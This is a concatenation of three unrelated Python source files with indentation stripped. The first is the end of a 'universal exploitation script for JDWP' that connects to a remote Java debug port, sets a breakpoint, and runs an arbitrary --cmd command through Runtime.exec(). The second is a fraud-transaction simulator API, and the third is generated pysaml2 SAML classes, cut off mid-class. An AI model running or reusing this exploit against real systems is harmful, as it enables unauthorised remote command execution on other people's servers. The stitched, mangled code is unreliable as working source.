for refId in self.methods.keys():
for entry in self.methods[refId]:
if entry["name"].lower() == name.lower() :
return entry
return None
def getfields(self, refTypeId):
if not self.fields.has_key( refTypeId ):
refId = self.format(self.referenceTypeIDSize, refTypeId)
self.socket.sendall( self.create_packet(FIELDS_SIG, data=refId) )
buf = self.read_reply()
formats = [ (self.fieldIDSize, "fieldId"),
('S', "name"),
('S', "signature"),
('I', "modbits")]
self.fields[refTypeId] = self.parse_entries(buf, formats)
return self.fields[refTypeId]
def getvalue(self, refTypeId, fieldId):
data = self.format(self.referenceTypeIDSize, refTypeId)
data+= struct.pack(">I", 1)
data+= self.format(self.fieldIDSize, fieldId)
self.socket.sendall( self.create_packet(GETVALUES_SIG, data=data) )
buf = self.read_reply()
formats = [ ("Z", "value") ]
field = self.parse_entries(buf, formats)[0]
return field
def createstring(self, data):
buf = self.buildstring(data)
self.socket.sendall( self.create_packet(CREATESTRING_SIG, data=buf) )
buf = self.read_reply()
return self.parse_entries(buf, [(self.objectIDSize, "objId")], False)
def buildstring(self, data):
return struct.pack(">I", len(data)) + data
def readstring(self, data):
size = struct.unpack(">I", data[:4])[0]
return data[4:4+size]
def suspendvm(self):
self.socket.sendall( self.create_packet( SUSPENDVM_SIG ) )
self.read_reply()
return
def resumevm(self):
self.socket.sendall( self.create_packet( RESUMEVM_SIG ) )
self.read_reply()
return
def invokestatic(self, classId, threadId, methId, *args):
data = self.format(self.referenceTypeIDSize, classId)
data+= self.format(self.objectIDSize, threadId)
data+= self.format(self.methodIDSize, methId)
data+= struct.pack(">I", len(args))
for arg in args:
data+= arg
data+= struct.pack(">I", 0)
self.socket.sendall( self.create_packet(INVOKESTATICMETHOD_SIG, data=data) )
buf = self.read_reply()
return buf
def invoke(self, objId, threadId, classId, methId, *args):
data = self.format(self.objectIDSize, objId)
data+= self.format(self.objectIDSize, threadId)
data+= self.format(self.referenceTypeIDSize, classId)
data+= self.format(self.methodIDSize, methId)
data+= struct.pack(">I", len(args))
for arg in args:
data+= arg
data+= struct.pack(">I", 0)
self.socket.sendall( self.create_packet(INVOKEMETHOD_SIG, data=data) )
buf = self.read_reply()
return buf
def solve_string(self, objId):
self.socket.sendall( self.create_packet(STRINGVALUE_SIG, data=objId) )
buf = self.read_reply()
if len(buf):
return self.readstring(buf)
else:
return ""
def query_thread(self, threadId, kind):
data = self.format(self.objectIDSize, threadId)
self.socket.sendall( self.create_packet(kind, data=data) )
buf = self.read_reply()
return
def suspend_thread(self, threadId):
return self.query_thread(threadId, THREADSUSPEND_SIG)
def status_thread(self, threadId):
return self.query_thread(threadId, THREADSTATUS_SIG)
def resume_thread(self, threadId):
return self.query_thread(threadId, THREADRESUME_SIG)
def send_event(self, eventCode, *args):
data = ""
data+= chr( eventCode )
data+= chr( SUSPEND_ALL )
data+= struct.pack(">I", len(args))
for kind, option in args:
data+= chr( kind )
data+= option
self.socket.sendall( self.create_packet(EVENTSET_SIG, data=data) )
buf = self.read_reply()
return struct.unpack(">I", buf)[0]
def clear_event(self, eventCode, rId):
data = chr(eventCode)
data+= struct.pack(">I", rId)
self.socket.sendall( self.create_packet(EVENTCLEAR_SIG, data=data) )
self.read_reply()
return
def clear_events(self):
self.socket.sendall( self.create_packet(EVENTCLEARALL_SIG) )
self.read_reply()
return
def wait_for_event(self):
buf = self.read_reply()
return buf
def parse_event_breakpoint(self, buf, eventId):
num = struct.unpack(">I", buf[2:6])[0]
rId = struct.unpack(">I", buf[6:10])[0]
if rId != eventId:
return None
tId = self.unformat(self.objectIDSize, buf[10:10+self.objectIDSize])
loc = -1 # don't care
return rId, tId, loc
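# A minimal sketch (local values only; no connection is made) of the wire format
# assumed by JDWPClient.create_packet()/read_reply(): every command packet starts
# with an 11-byte header -- length(4) | id(4) | flags(1) | command set(1) |
# command(1), all big endian -- followed by the command-specific payload.
def _example_idsizes_packet():
    client = JDWPClient("127.0.0.1")            # __init__ does not connect
    pkt = client.create_packet(IDSIZES_SIG)     # command set 1, command 7, no payload
    assert len(pkt) == 11
    assert struct.unpack(">I", pkt[:4])[0] == 11   # total length includes the header
    return pkt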
def runtime_exec(jdwp, args):
print ("[+] Targeting '%s:%d'" % (args.target, args.port))
print ("[+] Reading settings for '%s'" % jdwp.version)
# 1. get Runtime class reference
runtimeClass = jdwp.get_class_by_name("Ljava/lang/Runtime;")
if runtimeClass is None:
print ("[-] Cannot find class Runtime")
return False
print ("[+] Found Runtime class: id=%x" % runtimeClass["refTypeId"])
# 2. get getRuntime() meth reference
jdwp.get_methods(runtimeClass["refTypeId"])
getRuntimeMeth = jdwp.get_method_by_name("getRuntime")
if getRuntimeMeth is None:
print ("[-] Cannot find method Runtime.getRuntime()")
return False
print ("[+] Found Runtime.getRuntime(): id=%x" % getRuntimeMeth["methodId"])
# 3. setup breakpoint on frequently called method
c = jdwp.get_class_by_name( args.break_on_class )
if c is None:
print("[-] Could not access class '%s'" % args.break_on_class)
print("[-] It is possible that this class is not used by application")
print("[-] Test with another one with option `--break-on`")
return False
jdwp.get_methods( c["refTypeId"] )
m = jdwp.get_method_by_name( args.break_on_method )
if m is None:
print("[-] Could not access method '%s'" % args.break_on)
return False
loc = chr( TYPE_CLASS )
loc+= jdwp.format( jdwp.referenceTypeIDSize, c["refTypeId"] )
loc+= jdwp.format( jdwp.methodIDSize, m["methodId"] )
loc+= struct.pack(">II", 0, 0)
data = [ (MODKIND_LOCATIONONLY, loc), ]
rId = jdwp.send_event( EVENT_BREAKPOINT, *data )
print ("[+] Created break event id=%x" % rId)
# 4. resume vm and wait for event
jdwp.resumevm()
print ("[+] Waiting for an event on '%s'" % args.break_on)
while True:
buf = jdwp.wait_for_event()
ret = jdwp.parse_event_breakpoint(buf, rId)
if ret is not None:
break
rId, tId, loc = ret
print ("[+] Received matching event from thread %#x" % tId)
jdwp.clear_event(EVENT_BREAKPOINT, rId)
# 5. Now we can execute any code
if args.cmd:
runtime_exec_payload(jdwp, tId, runtimeClass["refTypeId"], getRuntimeMeth["methodId"], args.cmd)
else:
        # by default, only prints out a few system properties
runtime_exec_info(jdwp, tId)
jdwp.resumevm()
print ("[!] Command successfully executed")
return True
def runtime_exec_info(jdwp, threadId):
#
# This function calls java.lang.System.getProperties() and
# displays OS properties (non-intrusive)
#
properties = {"java.version": "Java Runtime Environment version",
"java.vendor": "Java Runtime Environment vendor",
"java.vendor.url": "Java vendor URL",
"java.home": "Java installation directory",
"java.vm.specification.version": "Java Virtual Machine specification version",
"java.vm.specification.vendor": "Java Virtual Machine specification vendor",
"java.vm.specification.name": "Java Virtual Machine specification name",
"java.vm.version": "Java Virtual Machine implementation version",
"java.vm.vendor": "Java Virtual Machine implementation vendor",
"java.vm.name": "Java Virtual Machine implementation name",
"java.specification.version": "Java Runtime Environment specification version",
"java.specification.vendor": "Java Runtime Environment specification vendor",
"java.specification.name": "Java Runtime Environment specification name",
"java.class.version": "Java class format version number",
"java.class.path": "Java class path",
"java.library.path": "List of paths to search when loading libraries",
"java.io.tmpdir": "Default temp file path",
"java.compiler": "Name of JIT compiler to use",
"java.ext.dirs": "Path of extension directory or directories",
"os.name": "Operating system name",
"os.arch": "Operating system architecture",
"os.version": "Operating system version",
"file.separator": "File separator",
"path.separator": "Path separator",
"user.name": "User's account name",
"user.home": "User's home directory",
"user.dir": "User's current working directory"
}
systemClass = jdwp.get_class_by_name("Ljava/lang/System;")
if systemClass is None:
print ("[-] Cannot find class java.lang.System")
return False
jdwp.get_methods(systemClass["refTypeId"])
getPropertyMeth = jdwp.get_method_by_name("getProperty")
if getPropertyMeth is None:
print ("[-] Cannot find method System.getProperty()")
return False
for propStr, propDesc in properties.iteritems():
propObjIds = jdwp.createstring(propStr)
if len(propObjIds) == 0:
print ("[-] Failed to allocate command")
return False
propObjId = propObjIds[0]["objId"]
data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, propObjId), ]
buf = jdwp.invokestatic(systemClass["refTypeId"],
threadId,
getPropertyMeth["methodId"],
*data)
if buf[0] != chr(TAG_STRING):
print ("[-] %s: Unexpected returned type: expecting String" % propStr)
else:
retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
            res = jdwp.solve_string(jdwp.format(jdwp.objectIDSize, retId))
print ("[+] Found %s '%s'" % (propDesc, res))
return True
def runtime_exec_payload(jdwp, threadId, runtimeClassId, getRuntimeMethId, command):
#
# This function will invoke command as a payload, which will be running
# with JVM privilege on host (intrusive).
#
print ("[+] Selected payload '%s'" % command)
# 1. allocating string containing our command to exec()
cmdObjIds = jdwp.createstring( command )
if len(cmdObjIds) == 0:
print ("[-] Failed to allocate command")
return False
cmdObjId = cmdObjIds[0]["objId"]
print ("[+] Command string object created id:%x" % cmdObjId)
# 2. use context to get Runtime object
buf = jdwp.invokestatic(runtimeClassId, threadId, getRuntimeMethId)
if buf[0] != chr(TAG_OBJECT):
print ("[-] Unexpected returned type: expecting Object")
return False
rt = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
if rt is None:
print "[-] Failed to invoke Runtime.getRuntime()"
return False
print ("[+] Runtime.getRuntime() returned context id:%#x" % rt)
# 3. find exec() method
execMeth = jdwp.get_method_by_name("exec")
if execMeth is None:
print ("[-] Cannot find method Runtime.exec()")
return False
print ("[+] found Runtime.exec(): id=%x" % execMeth["methodId"])
# 4. call exec() in this context with the alloc-ed string
data = [ chr(TAG_OBJECT) + jdwp.format(jdwp.objectIDSize, cmdObjId) ]
buf = jdwp.invoke(rt, threadId, runtimeClassId, execMeth["methodId"], *data)
if buf[0] != chr(TAG_OBJECT):
print ("[-] Unexpected returned type: expecting Object")
return False
retId = jdwp.unformat(jdwp.objectIDSize, buf[1:1+jdwp.objectIDSize])
print ("[+] Runtime.exec() successful, retId=%x" % retId)
return True
def str2fqclass(s):
i = s.rfind('.')
if i == -1:
print("Cannot parse path")
sys.exit(1)
method = s[i:][1:]
classname = 'L' + s[:i].replace('.', '/') + ';'
return classname, method
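# Illustration of str2fqclass(): it turns the --break-on value into the JNI-style
# class signature and method name used by the JDWP lookups above.
def _example_str2fqclass():
    classname, method = str2fqclass("java.net.ServerSocket.accept")
    assert classname == "Ljava/net/ServerSocket;"
    assert method == "accept"
    return classname, method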
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Universal exploitation script for JDWP by @_hugsy_",
formatter_class=argparse.ArgumentDefaultsHelpFormatter )
parser.add_argument("-t", "--target", type=str, metavar="IP", help="Remote target IP", required=True)
parser.add_argument("-p", "--port", type=int, metavar="PORT", default=8000, help="Remote target port")
parser.add_argument("--break-on", dest="break_on", type=str, metavar="JAVA_METHOD",
default="java.net.ServerSocket.accept", help="Specify full path to method to break on")
parser.add_argument("--cmd", dest="cmd", type=str, metavar="COMMAND",
help="Specify full path to method to break on")
args = parser.parse_args()
classname, meth = str2fqclass(args.break_on)
setattr(args, "break_on_class", classname)
setattr(args, "break_on_method", meth)
    retcode = 0
    cli = None
    try:
cli = JDWPClient(args.target, args.port)
cli.start()
if runtime_exec(cli, args) == False:
print ("[-] Exploit failed")
retcode = 1
except KeyboardInterrupt:
print ("[+] Exiting on user's request")
except Exception as e:
print ("[-] Exception: %s" % e)
retcode = 1
cli = None
finally:
if cli:
cli.leave()
sys.exit(retcode)
|
|
"""
This module provides an online API for the Unimaus Simulator. This can be useful in cases where
we want to have other code interacting with the simulator online, and don't necessarily need to
store the generated data in a file.
For a simple example of usage, see __main__ code at the bottom of this module.
@author Dennis Soemers (only the online API: Luisa Zintgraf developed the original simulator)
"""
from datetime import datetime
from data.features.aggregate_features import AggregateFeatures
from data.features.apate_graph_features import ApateGraphFeatures
from mesa.time import BaseScheduler
from simulator import parameters
from simulator.transaction_model import TransactionModel
class OnlineUnimaus:
def __init__(self, seed=123, stay_prob_genuine=0.9, stay_prob_fraud=0.99,
end_date=datetime(2999, 12, 31), params=None, random_schedule=False):
"""
Creates an object that can be used to run the simulator online / interactively. This means
that we can have it generate a bit of data, do something with the data, generate a bit more
data, do something again, etc. (as opposed to, generating one large batch of data, storing it
in a file, and then using it in a different program).
:param end_date:
Final possible date in the simulation. By default set to 31st December 2999, which allows for
a sufficiently long simulation run. If set to anything other than None, will override the
end_date as specified in params
:param params:
Parameters passed on to the UniMausTransactionModel. Will use the default parameters if None
:param random_schedule:
False by default. If set to True, we use a RandomActivation schedule to shuffle the order in
which agents are updated every step.
"""
if params is None:
params = parameters.get_default_parameters()
if end_date is not None:
params['end_date'] = end_date
if stay_prob_genuine is not None:
params['stay_prob'][0] = stay_prob_genuine
if stay_prob_fraud is not None:
params['stay_prob'][1] = stay_prob_fraud
if seed is not None:
params['seed'] = seed
if random_schedule:
self.model = TransactionModel(params)
else:
self.model = TransactionModel(params, scheduler=BaseScheduler(None))
self.params = params
self.aggregate_feature_constructor = None
self.apate_graph_feature_constructor = None
def block_cards(self, card_ids, replace_fraudsters=True):
"""
Blocks the given list of Card IDs (removing all genuine and fraudulent customers with matching
Card IDs from the simulation).
NOTE: This function is only intended to be called using Card IDs that are 100% known to have
been involved in fraudulent transactions. If the list contains more than a single Card ID,
and the Card ID has not been used in any fraudulent transactions, the function may not be able
to find the matching customer (due to an optimization in the implementation)
:param card_ids:
List of one or more Card IDs to block
:param replace_fraudsters:
If True, also replaces the banned fraudsters by an equal number of new fraudsters. True by default
"""
n = len(card_ids)
'''
print("block_cards called!")
if n == 0:
print("Not blocking anything")
for card_id in card_ids:
print("Blocking ", card_id)
'''
if n == 0:
# nothing to do
return
num_banned_fraudsters = 0
if n == 1:
# most efficient implementation in this case is simply to loop once through all customers (fraudulent
# as well as genuine) and compare to our single blocked card ID
blocked_card_id = card_ids[0]
for customer in self.model.customers:
if customer.card_id == blocked_card_id:
customer.stay = False
# should not be any more customers with same card ID, so can break
break
for fraudster in self.model.fraudsters:
if fraudster.card_id == blocked_card_id:
fraudster.stay = False
num_banned_fraudsters += 1
# should not be any more fraudsters with same card ID, so can break
break
else:
# with naive implementation, we'd have n loops through the entire list of customers, which may be expensive
# instead, we loop through it once to collect only those customers with corrupted cards. Then, we follow
# up with n loops through that much smaller list of customers with corrupted cards
compromised_customers = [c for c in self.model.customers if c.card_corrupted]
for blocked_card_id in card_ids:
for customer in compromised_customers:
if customer.card_id == blocked_card_id:
customer.stay = False
# should not be any more customers with same card ID, so can break
break
for fraudster in self.model.fraudsters:
if fraudster.card_id == blocked_card_id:
fraudster.stay = False
num_banned_fraudsters += 1
# should not be any more fraudsters with same card ID, so can break
break
if replace_fraudsters:
self.model.add_fraudsters(num_banned_fraudsters)
def clear_log(self):
"""
Clears all transactions generated so far from memory
"""
agent_vars = self.model.log_collector.agent_vars
for reporter_name in agent_vars:
agent_vars[reporter_name] = []
def get_log(self, clear_after=True):
"""
Returns a log (in the form of a pandas dataframe) of the transactions generated so far.
:param clear_after:
If True, will clear the transactions from memory. This means that subsequent calls to get_log()
will no longer include the transactions that have already been returned in a previous call.
:return:
The logged transactions. Returns None if no transactions were logged
"""
log = self.model.log_collector.get_agent_vars_dataframe()
if log is None:
return None
log.reset_index(drop=True, inplace=True)
if clear_after:
self.clear_log()
return log
def get_params_string(self):
"""
Returns a single string describing all of our param values.
:return:
"""
output = ""
for key in self.params:
output += str(key) + ":" + str(self.params[key]) + "-"
return output
def get_seed_str(self):
return str(self.params['seed'])
def get_stay_prob_genuine_str(self):
return str(self.params['stay_prob'][0])
def get_stay_prob_fraud_str(self):
return str(self.params['stay_prob'][1])
def step_simulator(self, num_steps=1):
"""
Runs num_steps steps of the simulator (simulates num_steps hours of transactions)
:param num_steps:
The number of steps to run. 1 by default.
:return:
True if we successfully simulated a step, false otherwise
"""
for step in range(num_steps):
if self.model.terminated:
print("WARNING: cannot step simulator because model is already terminated. ",
"Specify a later end_date in params to allow for a longer simulation.")
return False
self.model.step()
return True
def prepare_feature_constructors(self, data):
"""
Prepares feature constructors (objects which can compute new features for us) using
a given set of ''training data''. The training data passed into this function should
NOT be re-used when training predictive models using the new features, because the new
features will likely be unrealistically accurate on this data (and therefore models
trained on this data would learn to rely on the new features too much)
:param data:
Data used to ''learn'' features
"""
self.aggregate_feature_constructor = AggregateFeatures(data)
self.apate_graph_feature_constructor = ApateGraphFeatures(data)
def print_debug_info(self, data):
"""
Useful to call from Java, so that we can observe a dataset we want to debug through Python and easily
print info about it
:param data:
Dataset we want to know more about
"""
print("----- print_debug_info called! -----")
if data is None:
print("data is None")
else:
print("data is not None")
print(data.head())
print("num fraudulent transactions in data = ", data.loc[data["Target"] == 1].shape[0])
def process_data(self, data):
"""
Processes the given data, so that it will be ready for use in Machine Learning models. New features
are added by the feature constructors, features which are no longer necessary afterwards are removed,
and the Target feature is moved to the back of the dataframe
NOTE: processing is done in-place
:param data:
Data to process
:return:
Processed dataframe
"""
self.apate_graph_feature_constructor.add_graph_features(data)
self.aggregate_feature_constructor.add_aggregate_features(data)
# remove non-numeric columns / columns we don't need after adding features
data.drop(["Global_Date", "Local_Date", "MerchantID", "Currency", "Country",
"AuthSteps", "TransactionCancelled", "TransactionSuccessful"],
inplace=True, axis=1)
# move CardID and Target columns to the end
data = data[[col for col in data if col != "Target" and col != "CardID"] + ["CardID", "Target"]]
return data
def update_feature_constructors_unlabeled(self, data):
"""
Performs an update of existing feature constructors, treating the given new data
as being unlabeled.
:param data:
(unlabeled) new data (should NOT have been passed into prepare_feature_constructors() previously)
"""
self.aggregate_feature_constructor.update_unlabeled(data)
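# A sketch (helper name and step counts are illustrative, not part of the simulator)
# of the workflow described in the docstrings above: "learn" the feature constructors
# on one batch of transactions, then process later batches with them.
def _example_feature_workflow(simulator, n_warmup_steps=24, n_new_steps=24):
    simulator.step_simulator(n_warmup_steps)
    training_log = simulator.get_log(clear_after=True)
    if training_log is None:
        return None
    simulator.prepare_feature_constructors(training_log)
    simulator.step_simulator(n_new_steps)
    new_log = simulator.get_log(clear_after=True)
    if new_log is None:
        return None
    # ordering of this update relative to process_data() is illustrative only
    simulator.update_feature_constructors_unlabeled(new_log)
    return simulator.process_data(new_log)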
class DataLogWrapper:
def __init__(self, dataframe):
"""
Constructs a wrapper for a data log (in a dataframe). Provides some useful functions to make
it easier to access this data from Java through jpy. This class is probably not very useful in
pure Python.
:param dataframe:
The dataframe to wrap in an object
"""
self.dataframe = dataframe
def get_column_names(self):
"""
Returns a list of column names
:return:
List of column names
"""
return self.dataframe.columns
def get_data_list(self):
"""
Returns a flat list representation of the dataframe
:return:
"""
return [item for sublist in self.dataframe.as_matrix().tolist() for item in sublist]
def get_num_cols(self):
"""
Returns the number of columns in the dataframe
:return:
The number of columns in the dataframe
"""
return self.dataframe.shape[1]
def get_num_rows(self):
"""
Returns the number of rows in the dataframe
:return:
The number of rows in the dataframe
"""
return self.dataframe.shape[0]
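# An illustration of DataLogWrapper with a tiny hand-made frame (real logs come from
# OnlineUnimaus.get_log()); assumes a pandas version that still provides
# DataFrame.as_matrix(), which get_data_list() above relies on.
def _example_data_log_wrapper():
    import pandas as pd
    frame = pd.DataFrame({"CardID": [1, 2], "Target": [0, 1]})
    wrapper = DataLogWrapper(frame)
    assert wrapper.get_num_rows() == 2 and wrapper.get_num_cols() == 2
    return wrapper.get_data_list()   # flat, row-major, e.g. [1, 0, 2, 1]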
if __name__ == '__main__':
# construct our online simulator
simulator = OnlineUnimaus()
# change this value to change how often we run code inside the loop.
# with n_steps = 1, we run code after every hour of transactions.
# with n_steps = 2 for example, we would only run code every 2 steps
n_steps = 1
# if this is set to False, our simulator will not clear logged transactions after returning them from get_log.
# This would mean that subsequent get_log calls would also return transactions that we've already seen earlier
clear_logs_after_return = True
# if this is set to True, we block card IDs as soon as we observe them being involved in fraudulent transactions
# (we cheat a bit here by simply observing all true labels, this is just an example usage of API)
block_fraudsters = True
# keep running until we fail (which will be after 1 year due to end_date in default parameters)
while simulator.step_simulator(n_steps):
# get all transactions generated by the last n_steps (or all steps if clear_logs_after_return == False)
data_log = simulator.get_log(clear_after=clear_logs_after_return)
if data_log is not None:
#print(data_log)
if block_fraudsters:
simulator.block_cards(
[transaction.CardID for transaction in data_log.itertuples() if transaction.Target == 1])
|
|
#!/usr/bin/env python
#
# Generated Mon May 2 14:23:33 2011 by parse_xsd.py version 0.4.
#
from saml2.validate import valid_ipv4, MustValueError
from saml2.validate import valid_ipv6
from saml2.validate import ShouldValueError
from saml2.validate import valid_domain_name
import saml2
from saml2 import SamlBase
import xmldsig as ds
import xmlenc as xenc
NAMESPACE = 'urn:oasis:names:tc:SAML:2.0:assertion'
XSI_NAMESPACE = 'http://www.w3.org/2001/XMLSchema-instance'
XS_NAMESPACE = 'http://www.w3.org/2001/XMLSchema'
XSI_TYPE = '{%s}type' % XSI_NAMESPACE
XSI_NIL = '{%s}nil' % XSI_NAMESPACE
NAMEID_FORMAT_EMAILADDRESS = (
"urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress")
#NAMEID_FORMAT_UNSPECIFIED1 = (
# "urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified")
NAMEID_FORMAT_UNSPECIFIED = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:unspecified")
NAMEID_FORMAT_ENCRYPTED = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:encrypted")
NAMEID_FORMAT_PERSISTENT = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:persistent")
NAMEID_FORMAT_TRANSIENT = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:transient")
NAMEID_FORMAT_ENTITY = (
"urn:oasis:names:tc:SAML:2.0:nameid-format:entity")
PROFILE_ATTRIBUTE_BASIC = (
"urn:oasis:names:tc:SAML:2.0:profiles:attribute:basic")
AUTHN_PASSWORD = "urn:oasis:names:tc:SAML:2.0:ac:classes:Password"
AUTHN_PASSWORD_PROTECTED = \
"urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport"
NAME_FORMAT_UNSPECIFIED = (
"urn:oasis:names:tc:SAML:2.0:attrname-format:unspecified")
NAME_FORMAT_URI = "urn:oasis:names:tc:SAML:2.0:attrname-format:uri"
NAME_FORMAT_BASIC = "urn:oasis:names:tc:SAML:2.0:attrname-format:basic"
DECISION_TYPE_PERMIT = "Permit"
DECISION_TYPE_DENY = "Deny"
DECISION_TYPE_INDETERMINATE = "Indeterminate"
CONSENT_UNSPECIFIED = "urn:oasis:names:tc:SAML:2.0:consent:unspecified"
CONSENT_OBTAINED = "urn:oasis:names:tc:SAML:2.0:consent:obtained"
CONSENT_PRIOR = "urn:oasis:names:tc:SAML:2.0:consent:prior"
CONSENT_IMPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-implicit"
CONSENT_EXPLICIT = "urn:oasis:names:tc:SAML:2.0:consent:current-explicit"
CONSENT_UNAVAILABLE = "urn:oasis:names:tc:SAML:2.0:consent:unavailable"
CONSENT_INAPPLICABLE = "urn:oasis:names:tc:SAML:2.0:consent:inapplicable"
SCM_HOLDER_OF_KEY = "urn:oasis:names:tc:SAML:2.0:cm:holder-of-key"
SCM_SENDER_VOUCHES = "urn:oasis:names:tc:SAML:2.0:cm:sender-vouches"
SCM_BEARER = "urn:oasis:names:tc:SAML:2.0:cm:bearer"
# -----------------------------------------------------------------------------
XSD = "xs:"
NS_SOAP_ENC = "http://schemas.xmlsoap.org/soap/encoding/"
# -----------------------------------------------------------------------------
def _decode_attribute_value(typ, text):
if typ == XSD + "string":
return text or ""
if typ == XSD + "integer" or typ == XSD + "int":
return str(int(text))
if typ == XSD + "float" or typ == XSD + "double":
return str(float(text))
if typ == XSD + "boolean":
return "%s" % (text == "true" or text == "True")
if typ == XSD + "base64Binary":
import base64
return base64.decodestring(text)
raise ValueError("type %s not supported" % type)
def _verify_value_type(typ, val):
#print "verify value type: %s, %s" % (typ, val)
if typ == XSD + "string":
try:
return str(val)
except UnicodeEncodeError:
return unicode(val)
if typ == XSD + "integer" or typ == XSD + "int":
return int(val)
if typ == XSD + "float" or typ == XSD + "double":
return float(val)
if typ == XSD + "boolean":
if val.lower() == "true" or val.lower() == "false":
pass
else:
raise ValueError("Faulty boolean value")
if typ == XSD + "base64Binary":
import base64
return base64.decodestring(val)
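# A small illustration of the XSD helpers above (values are made up):
# _decode_attribute_value() normalises the text form, while _verify_value_type()
# checks that a value is consistent with its declared xsi:type.
def _example_xsd_helpers():
    assert _decode_attribute_value(XSD + "string", "hello") == "hello"
    assert _decode_attribute_value(XSD + "integer", "42") == "42"
    assert _decode_attribute_value(XSD + "boolean", "true") == "True"
    assert _verify_value_type(XSD + "integer", "42") == 42
    return True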
class AttributeValueBase(SamlBase):
def __init__(self,
text=None,
extension_elements=None,
extension_attributes=None):
self._extatt = {}
SamlBase.__init__(self,
text=None,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
if self._extatt:
self.extension_attributes = self._extatt
if not text:
self.extension_attributes = {XSI_NIL: 'true'}
else:
self.set_text(text)
def __setattr__(self, key, value):
if key == "text":
self.set_text(value)
else:
SamlBase.__setattr__(self, key, value)
def verify(self):
if not self.text:
assert self.extension_attributes
assert self.extension_attributes[XSI_NIL] == "true"
return True
else:
            return SamlBase.verify(self)
def set_type(self, typ):
try:
del self.extension_attributes[XSI_NIL]
except KeyError:
pass
try:
self.extension_attributes[XSI_TYPE] = typ
except AttributeError:
self._extatt[XSI_TYPE] = typ
def get_type(self):
try:
return self.extension_attributes[XSI_TYPE]
except (KeyError, AttributeError):
try:
return self._extatt[XSI_TYPE]
except KeyError:
return ""
def clear_type(self):
try:
del self.extension_attributes[XSI_TYPE]
except KeyError:
pass
try:
del self._extatt[XSI_TYPE]
except KeyError:
pass
def set_text(self, val, base64encode=False):
typ = self.get_type()
if base64encode:
import base64
val = base64.encodestring(val)
self.set_type("xs:base64Binary")
else:
if isinstance(val, basestring):
if not typ:
self.set_type("xs:string")
else:
try:
assert typ == "xs:string"
except AssertionError:
if typ == "xs:int":
_ = int(val)
elif typ == "xs:boolean":
if val.lower() not in ["true", "false"]:
raise ValueError("Not a boolean")
elif typ == "xs:float":
_ = float(val)
elif typ == "xs:base64Binary":
pass
else:
ValueError("Type and value doesn't match")
elif isinstance(val, bool):
if val:
val = "true"
else:
val = "false"
if not typ:
self.set_type("xs:boolean")
else:
assert typ == "xs:boolean"
elif isinstance(val, int):
val = str(val)
if not typ:
self.set_type("xs:integer")
else:
assert typ == "xs:integer"
elif isinstance(val, float):
val = str(val)
if not typ:
self.set_type("xs:float")
else:
assert typ == "xs:float"
elif not val:
try:
self.extension_attributes[XSI_TYPE] = typ
except AttributeError:
self._extatt[XSI_TYPE] = typ
val = ""
else:
if typ == "xs:anyType":
pass
else:
raise ValueError
SamlBase.__setattr__(self, "text", val)
return self
def harvest_element_tree(self, tree):
# Fill in the instance members from the contents of the XML tree.
for child in tree:
self._convert_element_tree_to_member(child)
for attribute, value in tree.attrib.iteritems():
self._convert_element_attribute_to_member(attribute, value)
if tree.text:
#print "set_text:", tree.text
# clear type
#self.clear_type()
self.set_text(tree.text)
try:
typ = self.extension_attributes[XSI_TYPE]
_verify_value_type(typ, getattr(self, "text"))
except KeyError:
pass
class BaseIDAbstractType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:BaseIDAbstractType element """
c_tag = 'BaseIDAbstractType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['NameQualifier'] = ('name_qualifier', 'string', False)
c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False)
def __init__(self,
name_qualifier=None,
sp_name_qualifier=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.name_qualifier = name_qualifier
self.sp_name_qualifier = sp_name_qualifier
class NameIDType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:NameIDType element """
c_tag = 'NameIDType'
c_namespace = NAMESPACE
c_value_type = {'base': 'string'}
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_attributes['NameQualifier'] = ('name_qualifier', 'string', False)
c_attributes['SPNameQualifier'] = ('sp_name_qualifier', 'string', False)
c_attributes['Format'] = ('format', 'anyURI', False)
c_attributes['SPProvidedID'] = ('sp_provided_id', 'string', False)
def __init__(self,
name_qualifier=None,
sp_name_qualifier=None,
format=None,
sp_provided_id=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
self.name_qualifier = name_qualifier
self.sp_name_qualifier = sp_name_qualifier
self.format = format
self.sp_provided_id = sp_provided_id
def name_id_type__from_string(xml_string):
return saml2.create_class_from_xml_string(NameIDType_, xml_string)
class EncryptedElementType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:assertion:EncryptedElementType element
"""
c_tag = 'EncryptedElementType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedData'] = (
'encrypted_data',
xenc.EncryptedData)
c_children['{http://www.w3.org/2001/04/xmlenc#}EncryptedKey'] = (
'encrypted_key',
[xenc.EncryptedKey])
c_cardinality['encrypted_key'] = {"min": 0}
c_child_order.extend(['encrypted_data', 'encrypted_key'])
def __init__(self,
encrypted_data=None,
encrypted_key=None,
text=None,
extension_elements=None,
extension_attributes=None):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes)
